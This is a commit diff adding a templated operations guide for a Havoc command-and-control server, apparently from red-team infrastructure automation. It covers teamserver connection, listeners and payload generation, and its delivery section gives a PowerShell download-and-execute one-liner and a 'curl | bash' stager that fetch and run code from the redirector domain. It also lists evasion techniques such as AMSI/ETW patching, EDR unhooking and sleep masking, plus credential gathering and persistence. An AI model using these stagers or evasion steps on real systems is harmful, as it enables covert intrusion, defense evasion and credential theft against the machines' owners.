restructuring for easier navigation and modularity
This commit is contained in:
@@ -0,0 +1,112 @@
|
||||
HAVOC C2 OPERATIONS GUIDE
|
||||
==========================
|
||||
|
||||
This guide provides information on using the Havoc C2 framework (dev branch)
|
||||
deployed on your infrastructure.
|
||||
|
||||
SERVER INFORMATION
|
||||
-----------------
|
||||
C2 Server IP: {{ c2_ip }}
|
||||
Redirector Domain: {{ redirector_domain }}
|
||||
Teamserver Port: {{ havoc_teamserver_port | default(40056) }}
|
||||
HTTP Listener Port: {{ havoc_http_port | default(8080) }}
|
||||
HTTPS Listener Port: {{ havoc_https_port | default(443) }}
|
||||
Admin User: {{ havoc_admin_user | default('admin') }}
|
||||
Admin Password: Stored in /root/Tools/Havoc/data/profiles/default.yaotl
|
||||
|
||||
CONNECTING TO THE TEAMSERVER
|
||||
---------------------------
|
||||
From your local machine:
|
||||
|
||||
1. Make sure Havoc client (dev branch) is installed:
|
||||
$ git clone -b dev https://github.com/HavocFramework/Havoc.git
|
||||
$ cd Havoc/Client
|
||||
$ mkdir build && cd build
|
||||
$ cmake -GNinja ..
|
||||
$ ninja
|
||||
|
||||
2. Connect to the Teamserver via GUI:
|
||||
- Host: {{ c2_ip }}
|
||||
- Port: {{ havoc_teamserver_port | default(40056) }}
|
||||
- User: {{ havoc_admin_user | default('admin') }}
|
||||
- Password: See /root/Tools/Havoc/data/profiles/default.yaotl
|
||||
|
||||
3. CLI Connection:
|
||||
$ ./havoc client --address {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }} --username {{ havoc_admin_user | default('admin') }} --password [password]
|
||||
|
||||
LISTENERS
|
||||
--------
|
||||
Two default listeners are configured:
|
||||
- HTTP on port {{ havoc_http_port | default(8080) }}
|
||||
- HTTPS on port {{ havoc_https_port | default(443) }} (through the redirector)
|
||||
|
||||
To view and manage listeners: Attack → Listeners in the Havoc client.
|
||||
|
||||
GENERATING PAYLOADS
|
||||
-----------------
|
||||
Pre-generated payloads are available in /root/Tools/Havoc/payloads/
|
||||
|
||||
To generate new payloads:
|
||||
1. Connect to the Teamserver
|
||||
2. Navigate to Attack → Payload
|
||||
3. Select the listener (HTTPS recommended)
|
||||
4. Choose architecture, format, and evasion options
|
||||
5. For enhanced evasion: Enable indirect syscalls, stack spoofing, and sleep mask
|
||||
|
||||
PAYLOAD DELIVERY
|
||||
--------------
|
||||
PowerShell one-liner:
|
||||
powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('https://{{ redirector_domain }}/windows_stager.ps1')"
|
||||
|
||||
Linux one-liner:
|
||||
curl -s https://{{ redirector_domain }}/linux_stager.sh | bash
|
||||
|
||||
OPERATIONAL SECURITY
|
||||
------------------
|
||||
- All connections are routed through the redirector
|
||||
- Payload customization includes:
|
||||
* Sleep time: {{ havoc_sleep | default(5) }} seconds with {{ havoc_jitter | default(30) }}% jitter
|
||||
* EDR unhooking techniques
|
||||
* AMSI/ETW patching
|
||||
* Indirect syscalls
|
||||
* Sleep masking with technique: {{ havoc_sleep_mask_technique | default(0) }}
|
||||
|
||||
ADVANCED FEATURES (DEV BRANCH)
|
||||
----------------------------
|
||||
- Enhanced memory scanner evasion
|
||||
- PPID spoofing capabilities
|
||||
- Reflective DLL loading improvements
|
||||
- EDR hook detection and avoidance
|
||||
- Process token manipulation
|
||||
- Registry persistence options
|
||||
|
||||
POST-EXPLOITATION
|
||||
---------------
|
||||
For post-exploitation, Havoc offers:
|
||||
|
||||
1. BOF (Beacon Object Files) support
|
||||
2. Integrated command & control modules
|
||||
3. File system operations
|
||||
4. Process injection & manipulation
|
||||
5. Credential gathering capabilities
|
||||
|
||||
SERVER MANAGEMENT
|
||||
---------------
|
||||
- Havoc Teamserver service: systemctl status havoc
|
||||
- Service configuration: /etc/systemd/system/havoc.service
|
||||
- Configuration profiles: /root/Tools/Havoc/data/profiles/
|
||||
|
||||
TROUBLESHOOTING
|
||||
--------------
|
||||
1. Agent connection issues:
|
||||
- Verify DNS for {{ redirector_domain }} points to your redirector
|
||||
- Check nginx configuration on the redirector
|
||||
- Confirm ports {{ havoc_http_port | default(8080) }} and {{ havoc_https_port | default(443) }} are open
|
||||
|
||||
2. Teamserver issues:
|
||||
- Check service: systemctl status havoc
|
||||
- View logs: journalctl -u havoc
|
||||
- Restart if needed: systemctl restart havoc
|
||||
|
||||
3. Use Havoc client CLI debugging:
|
||||
./havoc client --address {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }} --username {{ havoc_admin_user | default('admin') }} --password [password] --debug
|
||||
Reference in New Issue
Block a user